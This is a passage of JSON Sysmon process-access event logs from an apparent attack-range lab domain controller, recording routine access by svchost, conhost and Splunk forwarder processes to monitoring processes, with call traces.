05:57:50.948","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6505,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.948\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.948","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6506,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.948\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.948","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6507,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.948\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.948","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6508,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.948\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.948","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6509,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.948\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.948","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6510,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.948\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.948","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6511,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.948\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-045E-5F25-0000-0010715E0C00}\r\nTargetProcessId: 4464\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.948","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-045E-5F25-0000-0010715E0C00}","TargetProcessId":"4464","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6512,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:51.088\r\nSourceProcessGUID: {A837DB8D-045E-5F25-0000-0010715E0C00}\r\nSourceProcessId: 4464\r\nSourceThreadId: 2972\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:51.088","SourceProcessGUID":"{A837DB8D-045E-5F25-0000-0010715E0C00}","SourceProcessId":"4464","SourceThreadId":"2972","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
